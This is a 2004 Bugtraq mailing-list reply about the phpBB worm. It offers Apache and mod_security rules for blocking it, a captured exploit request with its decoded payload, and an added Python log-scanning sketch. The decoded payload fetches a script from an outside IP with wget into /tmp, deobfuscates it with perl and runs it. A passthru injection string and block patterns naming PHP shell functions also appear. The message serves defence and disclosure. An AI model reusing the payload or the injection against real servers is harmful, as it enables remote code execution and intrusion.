Re: phpBB Worm

From: Sebastian Wiesinger (bofh_at_fire-world.de)
Date: 12/22/04

    Date: Wed, 22 Dec 2004 12:22:15 +0100
    To: bugtraq@securityfocus.com
    
    

    * Raymond Dijkxhoorn <raymond@prolocation.net> [2004-12-22 00:06]:
    > If you cannot fix it (virtual servers) fast for all your clients you could
    > also try with something like this:
    >
    > RewriteEngine On
    > RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
    > RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
    > RewriteRule ^.*$ - [F]
    >
    > We had some vhosts where this worked just fine. On our systems we didn't
    > see any valid request with echr and esystem, just be gentle with it, it
    > works for me, it could work for you ;)

    If you use mod_security, this may help, too:

    SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("

    I had another exploit attempt, with this payload:

    66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET /forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%69%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"

    Which decodes to:

    rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*; echo _END_
    highlight='.passthru($HTTP_GET_VARS[rush]).'

    Regards,

    Sebastian

    -- 
    GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20)
    Wehret den Anfaengen: http://odem.org/informationsfreiheit/
    Thunder rolled. ... It rolled a six.
      --Terry Pratchett, Guards! Guards!
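
Added example (not part of the original message): a Python sketch that percent-decodes each query parameter of an access-log line until it stops changing, then applies the function-call pattern from the mod_security rule quoted above. The log lines are constructed (the first is shortened from the request shown above, with documentation IP addresses), and the function and field names are this example's own.

```python
import re
from urllib.parse import unquote, urlsplit

# Function-call pattern copied from the SecFilterSelective rule in the message.
PHP_CALL = re.compile(
    r"(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\(")
# Request field of an Apache access-log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IPs; the first is shortened from the post).
SAMPLE_WORM_LINE = (
    '192.0.2.10 - - [22/Dec/2004:10:06:47 +0100] "GET /forum/viewtopic.php'
    '?t=%37&rush=%65%63%68%6F%20%74%65%73%74&highlight=%2527.%70%61%73%73'
    '%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73'
    '%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"')
SAMPLE_BENIGN_LINE = (
    '192.0.2.11 - - [22/Dec/2004:10:07:02 +0100] "GET /forum/viewtopic.php'
    '?t=7&highlight=system+requirements HTTP/1.1" 200 9120 "-" "-"')

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value is stable; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect_log_line(line):
    """Return one finding per query parameter that decodes to a PHP call."""
    m = REQUEST.search(line)
    if not m:
        return []
    findings = []
    # Split on the raw '&' first so an encoded %26 stays inside its parameter.
    for pair in urlsplit(m.group(1)).query.split("&"):
        name, _, raw = pair.partition("=")
        decoded, rounds = fully_decode(raw)
        hit = PHP_CALL.search(decoded)
        if hit:
            findings.append({"param": name, "function": hit.group(1),
                             "rounds": rounds, "decoded": decoded,
                             "raw_match": bool(PHP_CALL.search(raw))})
    return findings

if __name__ == "__main__":
    for finding in inspect_log_line(SAMPLE_WORM_LINE):
        print(finding)
```

For the constructed worm line, `raw_match` is False and `rounds` is 2: the pattern does not match the undecoded log text, and the `%2527` wrapper only becomes a quote character on the second decoding pass.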
    
